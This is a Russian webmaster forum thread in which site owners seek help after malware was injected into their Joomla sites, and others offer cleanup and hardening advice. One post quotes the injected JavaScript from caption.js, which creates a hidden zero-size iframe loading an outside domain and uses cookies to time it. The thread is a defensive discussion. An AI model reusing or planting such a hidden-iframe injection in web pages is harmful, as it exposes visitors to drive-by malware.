Помогите найти вредоносный код на сайте (Joomla)

12
Likelo
На сайте с 26.12.2011
59
9476

Пришло на почту радостное письмо что на моих сайтах обнаружен вредоносный код, на хостинге 8 сайтов все попали под раздачу. С таким стыкаюсь первый, так что сори за панику:crazy:

Почитав ветку безопасность, понял, что ее у меня не было совсем... Ошибки исправил, удалил сохраненные пароли, изменил пароли для доступа, сканирую ПК, вирусы есть. Почистил.

Какие мои действия далее? Визуально смотрю на код сайтов, не вижу ничего...

Один из пациентов cargenius.ru

Помогите, пожалуйста:beer:

T
На сайте с 14.02.2012
20

cargenius.ru

Файл "/media/system/js/caption.js

Вредоносный код:

var ifnl9Jkc = document.createElement('iframe');ifnl9Jkc.name = 'ifnl9Jkc';ifnl9Jkc.src = 'http://loimret.55l55.com/';ifnl9Jkc.style.width = '0px';ifnl9Jkc.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifnl9Jkc=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifnl9Jkc);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifnl9Jkc=yes; path=/; expires=' + expiresDate; }, 5000);}};

Какой хостинг?

За эту неделю у многих появился такой вредоносный код на сайтах, сегодня и я его обнаружил на своем. Не совсем понятно откуда он, некоторые говорят, что проблема с софтом хостеров...

Вот в этой теме также люди пишут о такой проблеме:

тыц

Likelo
На сайте с 26.12.2011
59

Хостинг украинский, не хостлайф, подержка работает с 8 до 17-00 спрашивать не у кого. Что с этим кодом делать?

---------- Добавлено 27.08.2013 в 23:15 ----------

Связался с хостером, показал код, мне нашли файли на всех сайтах, где еть этот код, пока почистил. Как обезопасить сайты от повторного попадания данного кода на сайты? Пароль в Ц-панель поменял, стер все сохраненные пароль в браузере и ФТП клиенте...

[
На сайте с 30.12.2005
57

1) разово нанять специалиста, который проверит содержимое каждого сайта - могли оставить шеллы всякие

2) апгрейд всех движков и плагов на каждом сайте

3) закрыть админки и юзер_панели по ИПу, если с сайтом не работают копиры конечно(тут лучше иметь своих копиров, чтобы знать их ИПы, ну или один редактор, который заносит материал копиров на сайты)

4) смена непосредственно паролей на самих сайтах(желательно у всех юзеров)

5) регулярные бэкапы

И если вдруг что откат до предыдущей нормальной версии и повторение пунктов по новой :)

MaksimAlekseev
На сайте с 09.08.2013
14

Обновите файлы движка, темплейтов, модулей из дистрибутива. После этого проверьте тщательно установленные модули и темплейт, обычно взламывают через них, проверьте есть ли к ним обновления.

Хостинг сайтов с проактивной защитой от вирусов - http://yutex.ru (http://yutex.ru)
[Удален]

Я рекомендую сортировать файлы по дате модификации и смотреть те, которые были модифицированы во время заражения.

Другой вариант - скачайте бекап на локальный компьютер и просканируйте антивирусом. Я обычно сканирую авастом - он находит весь подозрительный код.

A0
На сайте с 08.12.2011
31
Dantomo:
Я рекомендую сортировать файлы по дате модификации и смотреть те, которые были модифицированы во время заражения.

Именно так и палятся модифицированный файлы. Если вердикт: поведенческий фактор, то ищем, как правило, js-файлы, измененные в то время, когда на сайте и появился вирус.

[
На сайте с 30.12.2005
57

Настоятельно советую все-таки нанять специалиста. Потому что говна может быть много ) И то что вы спалите модифицированный файл ничего вам не даст, ведь шелл через который этот файл изменили может лежать уже годика два на вашем сайте.

hexacell
На сайте с 10.12.2010
65

у меня хостлайф - нанимал несколько раз автора Ai-bolit (revisium.com) - были проставлены и права на файлы/папки, и настроен php.ini и htaccess в папках и корне... и что? и всё равно права сбрасываются, jquery.js модифицируется - удаляешь, меняешь пароли день-два проходит и снова. Ai-bolit говорит, что такое невозможно без root-прав. Хостер сообщает что на данный момент это глобальная проблема , для всех сайтов и всех хостинг провайдеров.

Куда сваливать? Кто-нибудь, хостящийся на Beget, среди пострадавших тут есть? Может к ним?

V
На сайте с 15.02.2010
52
vlv

И на бегете тоже есть проблемы.

hexacell
На сайте с 10.12.2010
65
vlv:
И на бегете тоже есть проблемы.

какие именно? тоже jquery ломается?

12